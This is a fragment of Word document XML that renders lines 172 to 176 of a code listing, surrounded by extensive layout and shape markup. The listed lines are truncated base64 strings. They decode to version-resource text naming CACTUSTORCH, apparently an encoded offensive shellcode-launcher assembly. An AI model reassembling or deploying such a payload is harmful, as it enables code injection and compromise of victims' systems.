          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>172</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"UwBUAE8AUgBDAEgAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AM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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>u"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>173</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ADAAAABAABAAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAQQBDAFQAVQBTAFQATwBSA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>EM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>174</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"SAAuAGQAbABsAAAAPAAMAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBBAEMAV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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>V"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>175</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AFMAVABPAFIAQwBIAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>176</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBBAEMAVABVAFMAV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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>P"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group style="position:absolute;margin-left:523.631pt;margin-top:0.0pt;width:0.0pt;height:842.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10472,0" coordsize="0,16840">
        <v:shape style="position:absolute;left:10472;top:0;width:0;height:16840" coordorigin="10472,0" coordsize="0,16840" path="m10472,0l10472,0,10472,0,10472,0,10472,0,10472,0,10472,1,10472,2,10472,3,10472,5,10472,7,10472,9,10472,13,10472,17,10472,21,10472,27,10472,33,10472,40,10472,49,10472,58,10472,68,10472,79,10472,92,10472,106,10472,121,10472,138,10472,156,10472,175,10472,196,10472,219,10472,243,10472,269,10472,297,10472,327,10472,359,10472,392,10472,428,10472,466,10472,506,10472,548,10472,592,10472,639,10472,688,10472,740,10472,794,10472,851,10472,910,10472,972,10472,1037,10472,1105,10472,1175,10472,1249,10472,1325,10472,1405,10472,1487,10472,1573,10472,1662,10472,1754,10472,1850,10472,1949,10472,2052,10472,2158,10472,2268,10472,2381,10472,2498,10472,2619,10472,2744,10472,2872,10472,3005,10472,3142,10472,3282,10472,3427,10472,3576,10472,3729,10472,3887,10472,4049,10472,4215,10472,4386,10472,4562,10472,4742,10472,4927,10472,5116,10472,5310,10472,5509,10472,5713,10472,5922,10472,6137,10472,6356,10472,6580,10472,6810,10472,7044,10472,7284,10472,7530,10472,7781,10472,8038,10472,8300,10472,8567,10472,8841,10472,9120,10472,9405,10472,9696,10472,9993,10472,10295,10472,10604,10472,10919,10472,11240,10472,11568,10472,11901,10472,12242,10472,12588,10472,12941,10472,13300,10472,13666,10472,14039,10472,14419,10472,14805,10472,15198,10472,15598,10472,16005,10472,16419,10472,16840e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:49.500pt;width:455.500pt;height:27.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,990" coordsize="9110,550">
        <v:shape style="position:absolute;left:1430;top:990;width:9110;height:550" coordorigin="1430,990" coordsize="9110,550" path="m1440,1000l1440,1000,1440,1000,1440,1000,1441,1000,1441,1000,1441,1000,1442,1000,1442,1000,1443,1000,1444,1000,1446,1000,1448,1000,1450,1000,1452,1000,1455,1000,1459,1000,1463,1000,1467,1000,1472,1000,1477,1000,1484,1000,1490,1000,1498,1000,1506,1000,1515,1000,1525,1000,1535,1000,1547,1000,1559,1000,1572,1000,1586,1000,1601,1000,1617,1000,1635,1000,1653,1000,1672,1000,1692,1000,1714,1000,1737,1000,1761,1000,1786,1000,1813,1000,1841,1000,1870,1000,1901,1000,1933,1000,1966,1000,2001,1000,2038,1000,2076,1000,2116,1000,2157,1000,2200,1000,2245,1000,2291,1000,2339,1000,2389,1000,2441,1000,2494,1000,2550,1000,2607,1000,2667,1000,2728,1000,2791,1000,2856,1000,2924,1000,2993,1000,3065,1000,3139,1000,3215,1000,3293,1000,3374,1000,3457,1000,3542,1000,3629,1000,3719,1000,3812,1000,3907,1000,4004,1000,4104,1000,4206,1000,4311,1000,4419,1000,4529,1000,4642,1000,4758,1000,4876,1000,4998,1000,5122,1000,5249,1000,5378,1000,5511,1000,5647,1000,5785,1000,5927,1000,6072,1000,6220,1000,6371,1000,6525,1000,6682,1000,6842,1000,7006,1000,7173,1000,7343,1000,7517,1000,7694,1000,7874,1000,8058,1000,8245,1000,8436,1000,8630,1000,8828,1000,9030,1000,9235,1000,9444,1000,9656,1000,9872,1000,10092,1000,10316,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1001,10543,1001,10543,1001,10543,1001,10543,1002,10543,1002,10543,1003,10543,1003,10543,1004,10543,1004,10543,1005,10543,1005,10543,1006,10543,1007,10543,1008,10543,1008,10543,1009,10543,1010,10543,1011,10543,1013,10543,1014,10543,1015,10543,1016,10543,1018,10543,1019,10543,1021,10543,1022,10543,1024,10543,1026,10543,1028,10543,1030,10543,1032,10543,1034,10543,1036,10543,1038,10543,1041,10543,1043,10543,1046,10543,1049,10543,1052,10543,1055,10543,1058,10543,1061,10543,1064,10543,1067,10543,1071,10543,1075,10543,1078,10543,1082,10543,1086,10543,1090,10543,1095,10543,1099,10543,1104,10543,1108,10543,1113,10543,1118,10543,1123,10543,1128,10543,1134,10543,1139,10543,1145,10543,1151,10543,1157,10543,1163,10543,1169,10543,1175,10543,1182,10543,1189,10543,1196,10543,1203,10543,1210,10543,1217,10543,1225,10543,1233,10543,1241,10543,1249,10543,1257,10543,1266,10543,1274,10543,1283,10543,1292,10543,1301,10543,1311,10543,1321,10543,1330,10543,1340,10543,1351,10543,1361,10543,1372,10543,1383,10543,1394,10543,1405,10543,1416,10543,1428,10543,1440,10543,1452,10543,1464,10543,1477,10543,1490,10543,1503,10543,1516,10543,1529,10543,1543,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10542,1557,10542,1557,10541,1557,10540,1557,10538,1557,10536,1557,10534,1557,10532,1557,10529,1557,10525,1557,10521,1557,10517,1557,10512,1557,10506,1557,10500,1557,10493,1557,10486,1557,10478,1557,10469,1557,10459,1557,10449,1557,10437,1557,10425,1557,10412,1557,10398,1557,10383,1557,10366,1557,10349,1557,10331,1557,10312,1557,10291,1557,10270,1557,10247,1557,10223,1557,10198,1557,10171,1557,10143,1557,10114,1557,10083,1557,10051,1557,10018,1557,9983,1557,9946,1557,9908,1557,9868,1557,9827,1557,9784,1557,9739,1557,9693,1557,9645,1557,9595,1557,9543,1557,9489,1557,9434,1557,9377,1557,9317,1557,9256,1557,9193,1557,9127,1557,9060,1557,8990,1557,8919,1557,8845,1557,8769,1557,8691,1557,8610,1557,8527,1557,8442,1557,8354,1557,8265,1557,8172,1557,8077,1557,7980,1557,7880,1557,7778,1557,7673,1557,7565,1557,7455,1557,7342,1557,7226,1557,7108,1557,6986,1557,6862,1557,6735,1557,6605,1557,6473,1557,6337,1557,6198,1557,6057,1557,5912,1557,5764,1557,5613,1557,5459,1557,5302,1557,5142,1557,4978,1557,4811,1557,4641,1557,4467,1557,4290,1557,4110,1557,3926,1557,3739,1557,3548,1557,3354,1557,3156,1557,2954,1557,2749,1557,2540,1557,2328,1557,2112,1557,1892,1557,1668,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1556,1440,1556,1440,1556,1440,1556,1440,1555,1440,1555,1440,1555,1440,1554,1440,1554,1440,1554,1440,1553,1440,1553,1440,1552,1440,1551,1440,1551,1440,1550,1440,1549,1440,1548,1440,1547,1440,1546,1440,1545,1440,1544,1440,1543,1440,1542,1440,1540,1440,1539,1440,1537,1440,1536,1440,1534,1440,1533,1440,1531,1440,1529,1440,1527,1440,1525,1440,1523,1440,1521,1440,1518,1440,1516,1440,1513,1440,1511,1440,1508,1440,1505,1440,1502,1440,1499,1440,1496,1440,1493,1440,1489,1440,1486,1440,1482,1440,1478,1440,1474,1440,1470,1440,1466,1440,1462,1440,1458,1440,1453,1440,1448,1440,1444,1440,1439,1440,1434,1440,1428,1440,1423,1440,1418,1440,1412,1440,1406,1440,1400,1440,1394,1440,1388,1440,1381,1440,1375,1440,1368,1440,1361,1440,1354,1440,1347,1440,1339,1440,1332,1440,1324,1440,1316,1440,1308,1440,1299,1440,1291,1440,1282,1440,1273,1440,1264,1440,1255,1440,1246,1440,1236,1440,1226,1440,1216,1440,1206,1440,1196,1440,1185,1440,1174,1440,1163,1440,1152,1440,1140,1440,1129,1440,1117,1440,1105,1440,1092,1440,1080,1440,1067,1440,1054,1440,1041,1440,1027,1440,1013,1440,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:49.500pt;width:1.500pt;height:28.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,990" coordsize="30,570">
        <v:shape style="position:absolute;left:1430;top:990;width:30;height:570" coordorigin="1430,990" coordsize="30,570" path="m1447,1000l1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1001,1447,1001,1447,1001,1447,1001,1447,1002,1447,1002,1447,1003,1447,1003,1447,1004,1447,1004,1447,1005,1447,1005,1447,1006,1447,1007,1447,1008,1447,1008,1447,1009,1447,1010,1447,1011,1447,1013,1447,1014,1447,1015,1447,1016,1447,1018,1447,1019,1447,1021,1447,1022,1447,1024,1447,1026,1447,1028,1447,1030,1447,1032,1447,1034,1447,1036,1447,1038,1447,1041,1447,1043,1447,1046,1447,1049,1447,1052,1447,1055,1447,1058,1447,1061,1447,1064,1447,1067,1447,1071,1447,1075,1447,1078,1447,1082,1447,1086,1447,1090,1447,1095,1447,1099,1447,1104,1447,1108,1447,1113,1447,1118,1447,1123,1447,1128,1447,1134,1447,1139,1447,1145,1447,1151,1447,1157,1447,1163,1447,1169,1447,1175,1447,1182,1447,1189,1447,1196,1447,1203,1447,1210,1447,1217,1447,1225,1447,1233,1447,1241,1447,1249,1447,1257,1447,1266,1447,1274,1447,1283,1447,1292,1447,1301,1447,1311,1447,1321,1447,1330,1447,1340,1447,1351,1447,1361,1447,1372,1447,1383,1447,1394,1447,1405,1447,1416,1447,1428,1447,1440,1447,1452,1447,1464,1447,1477,1447,1490,1447,1503,1447,1516,1447,1529,1447,1543,1447,1557e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:76.500pt;width:455.500pt;height:28.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,1530" coordsize="9110,570">
        <v:shape style="position:absolute;left:1430;top:1530;width:9110;height:570" coordorigin="1430,1530" coordsize="9110,570" path="m1440,1557l1440,1557,1440,1557,1440,1557,1441,1557,1441,1557,1441,1557,1442,1557,1442,1557,1443,1557,1444,1557,1446,1557,1448,1557,1450,1557,1452,1557,1455,1557,1459,1557,1463,1557,1467,1557,1472,1557,1477,1557,1484,1557,1490,1557,1498,1557,1506,1557,1515,1557,1525,1557,1535,1557,1547,1557,1559,1557,1572,1557,1586,1557,1601,1557,1617,1557,1635,1557,1653,1557,1672,1557,1692,1557,1714,1557,1737,1557,1761,1557,1786,1557,1813,1557,1841,1557,1870,1557,1901,1557,1933,1557,1966,1557,2001,1557,2038,1557,2076,1557,2116,1557,2157,1557,2200,1557,2245,1557,2291,1557,2339,1557,2389,1557,2441,1557,2494,1557,2550,1557,2607,1557,2667,1557,2728,1557,2791,1557,2856,1557,2924,1557,2993,1557,3065,1557,3139,1557,3215,1557,3293,1557,3374,1557,3457,1557,3542,1557,3629,1557,3719,1557,3812,1557,3907,1557,4004,1557,4104,1557,4206,1557,4311,1557,4419,1557,4529,1557,4642,1557,4758,1557,4876,1557,4998,1557,5122,1557,5249,1557,5378,1557,5511,1557,5647,1557,5785,1557,5927,1557,6072,1557,6220,1557,6371,1557,6525,1557,6682,1557,6842,1557,7006,1557,7173,1557,7343,1557,7517,1557,7694,1557,7874,1557,8058,1557,8245,1557,8436,1557,8630,1557,8828,1557,9030,1557,9235,1557,9444,1557,9656,1557,9872,1557,10092,1557,10316,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1558,10543,1558,10543,1558,10543,1558,10543,1558,10543,1558,10543,1559,10543,1559,10543,1559,10543,1560,10543,1560,10543,1561,10543,1561,10543,1562,10543,1562,10543,1563,10543,1563,10543,1564,10543,1565,10543,1566,10543,1567,10543,1568,10543,1569,10543,1570,10543,1571,10543,1572,10543,1573,10543,1575,10543,1576,10543,1578,10543,1579,10543,1581,10543,1583,10543,1585,10543,1587,10543,1589,10543,1591,10543,1593,10543,1595,10543,1598,10543,1600,10543,1603,10543,1605,10543,1608,10543,1611,10543,1614,10543,1617,10543,1620,10543,1623,10543,1627,10543,1630,10543,1634,10543,1638,10543,1642,10543,1646,10543,1650,10543,1654,10543,1659,10543,1663,10543,1668,10543,1673,10543,1678,10543,1683,10543,1688,10543,1693,10543,1699,10543,1705,10543,1710,10543,1716,10543,1723,10543,1729,10543,1735,10543,1742,10543,1749,10543,1756,10543,1763,10543,1770,10543,1777,10543,1785,10543,1793,10543,1801,10543,1809,10543,1817,10543,1826,10543,1834,10543,1843,10543,1852,10543,1861,10543,1871,10543,1880,10543,1890,10543,1900,10543,1910,10543,1921,10543,1931,10543,1942,10543,1953,10543,1964,10543,1976,10543,1987,10543,1999,10543,2011,10543,2023,10543,2036,10543,2049,10543,2062,10543,2075,10543,2088,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10542,2102,10542,2102,10541,2102,10540,2102,10538,2102,10536,2102,10534,2102,10532,2102,10529,2102,10525,2102,10521,2102,10517,2102,10512,2102,10506,2102,10500,2102,10493,2102,10486,2102,10478,2102,10469,2102,10459,2102,10449,2102,10437,2102,10425,2102,10412,2102,10398,2102,10383,2102,10366,2102,10349,2102,10331,2102,10312,2102,10291,2102,10270,2102,10247,2102,10223,2102,10198,2102,10171,2102,10143,2102,10114,2102,10083,2102,10051,2102,10018,2102,9983,2102,9946,2102,9908,2102,9868,2102,9827,2102,9784,2102,9739,2102,9693,2102,9645,2102,9595,2102,9543,2102,9489,2102,9434,2102,9377,2102,9317,2102,9256,2102,9193,2102,9127,2102,9060,2102,8990,2102,8919,2102,8845,2102,8769,2102,8691,2102,8610,2102,8527,2102,8442,2102,8354,2102,8265,2102,8172,2102,8077,2102,7980,2102,7880,2102,7778,2102,7673,2102,7565,2102,7455,2102,7342,2102,7226,2102,7108,2102,6986,2102,6862,2102,6735,2102,6605,2102,6473,2102,6337,2102,6198,2102,6057,2102,5912,2102,5764,2102,5613,2102,5459,2102,5302,2102,5142,2102,4978,2102,4811,2102,4641,2102,4467,2102,4290,2102,4110,2102,3926,2102,3739,2102,3548,2102,3354,2102,3156,2102,2954,2102,2749,2102,2540,2102,2328,2102,2112,2102,1892,2102,1668,2102,1440,2102,1440,2102,1440,2102,1440,2102,1440,2102,1440,2102,1440,2102,1440,2102,1440,2102,1440,2102,1440,2101,1440,2101,1440,2101,1440,2101,1440,2101,1440,2101,1440,2101,1440,2100,1440,2100,1440,2100,1440,2100,1440,2099,1440,2099,1440,2098,1440,2098,1440,2097,1440,2097,1440,2096,1440,2095,1440,2095,1440,2094,1440,2093,1440,2092,1440,2091,1440,2090,1440,2089,1440,2088,1440,2087,1440,2085,1440,2084,1440,2083,1440,2081,1440,2079,1440,2078,1440,2076,1440,2074,1440,2072,1440,2070,1440,2068,1440,2066,1440,2064,1440,2061,1440,2059,1440,2056,1440,2054,1440,2051,1440,2048,1440,2045,1440,2042,1440,2039,1440,2035,1440,2032,1440,2028,1440,2025,1440,2021,1440,2017,1440,2013,1440,2009,1440,2005,1440,2000,1440,1996,1440,1991,1440,1986,1440,1981,1440,1976,1440,1971,1440,1965,1440,1960,1440,1954,1440,1948,1440,1942,1440,1936,1440,1930,1440,1924,1440,1917,1440,1910,1440,1903,1440,1896,1440,1889,1440,1881,1440,1874,1440,1866,1440,1858,1440,1850,1440,1842,1440,1833,1440,1825,1440,1816,1440,1807,1440,1798,1440,1788,1440,1779,1440,1769,1440,1759,1440,1749,1440,1738,1440,1728,1440,1717,1440,1706,1440,1695,1440,1683,1440,1672,1440,1660,1440,1648,1440,1635,1440,1623,1440,1610,1440,1597,1440,1584,1440,1571,1440,1557e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:77.500pt;width:1.500pt;height:27.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,1550" coordsize="30,550">
        <v:shape style="position:absolute;left:1430;top:1550;width:30;height:550" coordorigin="1430,1550" coordsize="30,550" path="m1447,1557l1447,1557,1447,1557,1447,1557,1447,1557,1447,1557,1447,1557,1447,1557,1447,1557,1447,1557,1447,1557,1447,1557,1447,1558,1447,1558,1447,1558,1447,1558,1447,1558,1447,1558,1447,1559,1447,1559,1447,1559,1447,1560,1447,1560,1447,1561,1447,1561,1447,1562,1447,1562,1447,1563,1447,1563,1447,1564,1447,1565,1447,1566,1447,1567,1447,1568,1447,1569,1447,1570,1447,1571,1447,1572,1447,1573,1447,1575,1447,1576,1447,1578,1447,1579,1447,1581,1447,1583,1447,1585,1447,1587,1447,1589,1447,1591,1447,1593,1447,1595,1447,1598,1447,1600,1447,1603,1447,1605,1447,1608,1447,1611,1447,1614,1447,1617,1447,1620,1447,1623,1447,1627,1447,1630,1447,1634,1447,1638,1447,1642,1447,1646,1447,1650,1447,1654,1447,1659,1447,1663,1447,1668,1447,1673,1447,1678,1447,1683,1447,1688,1447,1693,1447,1699,1447,1705,1447,1710,1447,1716,1447,1723,1447,1729,1447,1735,1447,1742,1447,1749,1447,1756,1447,1763,1447,1770,1447,1777,1447,1785,1447,1793,1447,1801,1447,1809,1447,1817,1447,1826,1447,1834,1447,1843,1447,1852,1447,1861,1447,1871,1447,1880,1447,1890,1447,1900,1447,1910,1447,1921,1447,1931,1447,1942,1447,1953,1447,1964,1447,1976,1447,1987,1447,1999,1447,2011,1447,2023,1447,2036,1447,2049,1447,2062,1447,2075,1447,2088,1447,2102e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:104.500pt;width:455.500pt;height:27.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,2090" coordsize="9110,550">
        <v:shape style="position:absolute;left:1430;top:2090;width:9110;height:550" coordorigin="1430,2090" coordsize="9110,550" path="m1440,2102l1440,2102,1440,2102,1440,2102,1441,2102,1441,2102,1441,2102,1442,2102,1442,2102,1443,2102,1444,2102,1446,2102,1448,2102,1450,2102,1452,2102,1455,2102,1459,2102,1463,2102,1467,2102,1472,2102,1477,2102,1484,2102,1490,2102,1498,2102,1506,2102,1515,2102,1525,2102,1535,2102,1547,2102,1559,2102,1572,2102,1586,2102,1601,2102,1617,2102,1635,2102,1653,2102,1672,2102,1692,2102,1714,2102,1737,2102,1761,2102,1786,2102,1813,2102,1841,2102,1870,2102,1901,2102,1933,2102,1966,2102,2001,2102,2038,2102,2076,2102,2116,2102,2157,2102,2200,2102,2245,2102,2291,2102,2339,2102,2389,2102,2441,2102,2494,2102,2550,2102,2607,2102,2667,2102,2728,2102,2791,2102,2856,2102,2924,2102,2993,2102,3065,2102,3139,2102,3215,2102,3293,2102,3374,2102,3457,2102,3542,2102,3629,2102,3719,2102,3812,2102,3907,2102,4004,2102,4104,2102,4206,2102,4311,2102,4419,2102,4529,2102,4642,2102,4758,2102,4876,2102,4998,2102,5122,2102,5249,2102,5378,2102,5511,2102,5647,2102,5785,2102,5927,2102,6072,2102,6220,2102,6371,2102,6525,2102,6682,2102,6842,2102,7006,2102,7173,2102,7343,2102,7517,2102,7694,2102,7874,2102,8058,2102,8245,2102,8436,2102,8630,2102,8828,2102,9030,2102,9235,2102,9444,2102,9656,2102,9872,2102,10092,2102,10316,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2103,10543,2103,10543,2103,10543,2103,10543,2104,10543,2104,10543,2104,10543,2105,10543,2105,10543,2106,10543,2106,10543,2107,10543,2108,10543,2108,10543,2109,10543,2110,10543,2111,10543,2112,10543,2113,10543,2114,10543,